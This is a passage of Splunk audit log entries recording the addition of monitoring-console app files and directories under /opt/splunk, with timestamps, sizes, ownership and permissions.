action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_check_list.js", isdir=0, size=104457, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.395, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_check.js", isdir=0, size=469355, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.392, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_alerts_setup.js", isdir=0, size=121051, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.387, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/common.js", isdir=0, size=12178895, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.283, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.271, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/css/bootstrap-lite.css", isdir=0, size=150937, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.267, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/css/bootstrap-enterprise.css", isdir=0, size=150885, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.263, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/css/bootstrap-dark.css", isdir=0, size=150821, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.258, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.252, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/css", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.145, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/volume_detail_deployment_extension.js", isdir=0, size=3581, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/splunk_tcpin_performance_instance_extension.js", isdir=0, size=4851, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.131, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/splunk_tcpin_performance_extension.js", isdir=0, size=4833, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.126, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/splunk_tcpin_performance_extension.css", isdir=0, size=112, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.122, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/splunk_tcpin_performance_deployment_extension.js", isdir=0, size=3604, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/splunk_data_pipeline.png", isdir=0, size=52315, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.114, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/shared.css", isdir=0, size=189, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/search_usage_statistics_extension.js", isdir=0, size=3430, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/search_activity_deployment_extension.js", isdir=0, size=4327, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.101, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/scheduler_activity_extension.js", isdir=0, size=3917, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.097, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/resource_usage_deployment_extension.js", isdir=0, size=6113, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.093, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/overview_alerts_extension.js", isdir=0, size=15535, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.088, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/overview_alerts_extension.css", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.083, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/kv_store_instance_extension.js", isdir=0, size=3504, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/kv_store_deployment_extension.js", isdir=0, size=5989, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.075, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/indexing_performance_instance_extension.css", isdir=0, size=1030, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.071, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/indexing_performance_deployment_extension.js", isdir=0, size=4331, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.067, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/indexer_clustering_status_extension.js", isdir=0, size=5031, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/indexer_clustering_status_extension.css", isdir=0, size=1140, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.057, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/index_type.css", isdir=0, size=81, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.053, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/index_detail_deployment_extension.js", isdir=0, size=3569, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/http_event_collector_extension.js", isdir=0, size=3449, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/http_event_collector.css", isdir=0, size=620, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/health-check.css", isdir=0, size=232, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.032, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/forwarder_overview_extension.js", isdir=0, size=10569, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.028, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/forwarder_monitoring_extension.js", isdir=0, size=3226, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.022, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/forwarder_monitoring_extension.css", isdir=0, size=54, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.017, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/drilldown_action_extension.js", isdir=0, size=8371, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/dashboard.js", isdir=0, size=4061, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/dashboard.css", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.003, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/common_control_lite.js", isdir=0, size=18100, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.999, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/common_control.js", isdir=0, size=5411, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/cell_fill_gauge.js", isdir=0, size=6814, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.989, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:55.684, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/template/mc_app.html", isdir=0, size=3271, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.678, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:55.673, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/template", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:55.669, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:55.664, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/manager/resource_usage.prod_lite.xml", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.660, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/manager/platform_alerts.prod_lite.xml", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.655, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/manager/forwarder_monitoring.prod_lite.xml", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav/default.xml", isdir=0, size=2329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.642, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav/default.single.xml", isdir=0, size=2267, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.638, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav/default.prod_lite.xml", isdir=0, size=197, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav/default.env_cloud.xml", isdir=0, size=584, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.630, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/nav/default.distributed.xml", isdir=0, size=4183, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/workload_management_per_pool_instance.xml", isdir=0, size=26083, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.522, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/workload_management_per_pool_deployment.xml", isdir=0, size=22189, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.519, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/workload_management_monitoring_instance.xml", isdir=0, size=10086, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.515, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/workload_management_monitoring_distributed.xml", isdir=0, size=10540, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/workload_management.xml", isdir=0, size=6664, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.507, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/volume_detail_instance.xml", isdir=0, size=17308, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.504, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/volume_detail_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/volume_detail_deployment.xml", isdir=0, size=9706, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.493, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/volume_detail_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.489, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/standalone.xml", isdir=0, size=198, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/standalone.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.481, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/splunk_tcpin_performance_instance.xml", isdir=0, size=11944, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/splunk_tcpin_performance_instance.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/splunk_tcpin_performance_deployment.xml", isdir=0, size=37322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/splunk_tcpin_performance_deployment.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/smartstore_cache_performance_instance.xml", isdir=0, size=9290, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/smartstore_cache_performance_deployment.xml", isdir=0, size=8781, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/smartstore_activity_instance.xml", isdir=0, size=7651, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/smartstore_activity_deployment.xml", isdir=0, size=7023, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_status_and_conf.xml", isdir=0, size=42305, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_status_and_conf.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_scheduler_delegation_statistics.xml", isdir=0, size=12677, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_scheduler_delegation_statistics.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_conf_rep.xml", isdir=0, size=23093, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_conf_rep.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.421, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_artifact_replication.xml", isdir=0, size=13383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_artifact_replication.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_app_deployment.xml", isdir=0, size=18303, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/shc_app_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.404, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_usage_statistics_instance.xml", isdir=0, size=9007, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.400, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_usage_statistics_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.396, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_usage_statistics_instance.env_cloud.xml", isdir=0, size=9165, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.392, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_usage_statistics_deployment.xml", isdir=0, size=10718, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.388, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_activity_instance.xml", isdir=0, size=44321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_activity_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_activity_deployment.xml", isdir=0, size=28169, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.375, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/search_activity_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.371, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_assistant.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.367, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_activity_instance.xml", isdir=0, size=39738, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.363, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_activity_instance.prod_lite.xml", isdir=0, size=8714, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.359, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_activity_instance.env_cloud.xml", isdir=0, size=34974, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.355, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_activity_deployment.xml", isdir=0, size=17092, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.351, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/scheduler_activity_deployment.prod_lite.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_machine.xml", isdir=0, size=27154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.343, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_machine.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_instance.xml", isdir=0, size=20002, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.335, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_instance.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.332, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_deployment.xml", isdir=0, size=52461, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:55.328, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/data/ui/views/resource_usage_deployment.prod_lite.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", 